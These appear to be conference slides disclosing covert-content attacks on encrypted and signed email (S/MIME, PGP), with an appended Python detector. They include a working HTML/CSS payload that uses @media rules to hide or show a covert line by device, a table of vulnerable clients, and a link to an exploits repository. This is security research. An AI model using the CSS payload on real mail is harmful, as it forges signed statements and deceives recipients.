7. Remember EFAIL?
• Last year: EFAIL
– Major attack with a logo
– Novel attack techniques targeting S/MIME + PGP
• Today: non-crypto attacks
– Targeting encryption and digital signatures
13. Technology's promise
I. “Strong crypto is virtually unbreakable.”
II. “Digital signature will prevail. Math wins.”
What if…
…claims I. and II. could be bypassed with a single reply to a benign-looking email?
26. Multipart MIME email

From: alice@good.com
To: johnny@good.com
Content-type: multipart/mixed; boundary="XXX"

--XXX
Content-type: text/plain

Some ASCII text message…
--XXX
Content-type: text/plain

This is the 2nd part
--XXX--

Structure: multipart/mixed
├─ text
└─ text
40. Attacker model
• Eve has captured ciphertext
• Can modify email structure
• Can re-send it to the victim
– Either to recipient or sender
– Both can decrypt the email
71. Signature oracle

From: eve@evil.com
To: johnny@good.com
Content-type: text/html

<style>
IF condition:
Hide * but show .covert
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
73. Signature oracle

From: eve@evil.com
To: johnny@good.com
Content-type: text/html

<style>
/* hide covert content on mobile devices */
@media (max-device-width: 834px) {
.covert {visibility: hidden;}}
/* but show on desktop devices */
@media (min-device-width: 835px) {
* {visibility: hidden;}
.covert {visibility: visible}}
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
77. Re: What's up Johnny?

Reply email sent from Johnny’s mobile phone:

I'm fine, thanks.
On 01/05/19 09:53, Eve wrote:
> What's up Johnny?

Signed email received on a desktop device:

I hereby declare war.
82. Conditional rules
• Targeting device type (@media)
• Targeting email client (@supports)
• Targeting user account (@document)
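A defensive check for the conditional rules listed above, as an added example that is not taken from the slides or from the RUB-NDS repository: it walks a message's MIME parts and reports which of @media, @supports or @document wrap a visibility toggle inside an HTML part's <style> block. The function names and the BENIGN sample are assumptions made for this illustration; COVERT reproduces the slide 73 message with its CSS joined onto fewer lines.

```python
import re
from email import message_from_string

STYLE_RE = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
# The three at-rules named on the slide, with an optional vendor prefix.
AT_RE = re.compile(r"@(?:-\w+-)?(media|supports|document)\b[^{]*\{", re.I)
TOGGLE_RE = re.compile(r"visibility\s*:|display\s*:\s*none", re.I)

def conditional_blocks(css):
    """Yield (at_rule, body) for each conditional block, matching nested braces."""
    pos = 0
    while (m := AT_RE.search(css, pos)):
        depth, end = 1, m.end()
        while end < len(css) and depth:
            depth += {"{": 1, "}": -1}.get(css[end], 0)
            end += 1
        yield "@" + m.group(1).lower(), css[m.end():end]
        pos = end

def find_covert_rules(raw_email):
    """Return the conditional at-rules that toggle visibility in any HTML part."""
    hits = set()
    for part in message_from_string(raw_email).walk():
        if part.get_content_type() != "text/html":
            continue  # multipart containers and text/plain carry no CSS
        html = part.get_payload(decode=True).decode("utf-8", "replace")
        for css in STYLE_RE.findall(html):
            hits.update(rule for rule, body in conditional_blocks(css)
                        if TOGGLE_RE.search(body))
    return sorted(hits)

# Sample input: the message shown on slide 73.
COVERT = """\
From: eve@evil.com
To: johnny@good.com
Content-type: text/html

<style>
@media (max-device-width: 834px) {.covert {visibility: hidden;}}
@media (min-device-width: 835px) {* {visibility: hidden;} .covert {visibility: visible}}
</style>
What's up Johnny?
<div class="covert">I hereby declare war.</div>
"""
# Constructed benign sample: a responsive rule that only changes the font size.
BENIGN = ("Content-type: text/html\n\n"
          "<style>@media (max-width: 600px) {p {font-size: 18px}}</style><p>Hi</p>\n")
if __name__ == "__main__":
    print(find_covert_rules(COVERT), find_covert_rules(BENIGN))
```

A hit is a heuristic signal, not proof: legitimate responsive mail also hides elements inside @media blocks.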
84. Overview
1. Introduction
2. Attacks on Encryption
3. Attacks on Signatures
4. Evaluation
5. Mitigation
90.
OS       Client         Decryption      Signatures
                        S/MIME  PGP     S/MIME  PGP
Windows  Thunderbird    ●       ●       ●       ●
         Outlook        ○       ○       ◐       ◐
         Win. 10 Mail   ○       –       ◐       –
         Win Live Mail  ○       –       ●       –
         The Bat!       ○       ○       ○       ○
         Postbox        ●       ●       ●       ●
         eM Client      ○       ○       ◐       ◐
Linux    KMail          ◐       ◐       ○       ○
         Evolution      ◐       ◐       ◐       ◐
         Trojitá        ◐       ◐       ◐       ◐
         Claws          ◐       ◐       ○       ○
         Mutt           ◐       ◐       ○       ○
macOS    Apple Mail     ●       ●       ◐       ◐
         MailMate       ●       ●       ●       ●
         Airmail        ●       ●       ●       ●
iOS      Mail App       ●       –       ●       –
Android  K-9 Mail       –       ○       –       ●
         R2Mail2        ○       ●       ◐       ◐
         MailDroid      ○       ○       ●       ●
         Nine           ○       –       ●       –
Web      Exchange/OWA   ○       –       ●       –
         Roundcube      –       ◐       ◐       ◐
         Horde/IMP      ○       ○       ◐       ◐
         Mailpile       –       ○       –       ○

Legend:
○ No vulnerabilities found
– Cryptosystem not available
Decryption oracles:
● Plaintext can be completely hidden
◐ Plaintext merged with attacker-text
Signature oracles:
● Covert rules kept in reply message
◐ Covert rules only for received mail
111. Conclusion
• Crypto is not enough, bypasses exist
• 22 of 24 tested clients are vulnerable
• Building security on top of email is hard
Thank you! Questions?
Exploits: github.com/RUB-NDS/Covert-Content-Attacks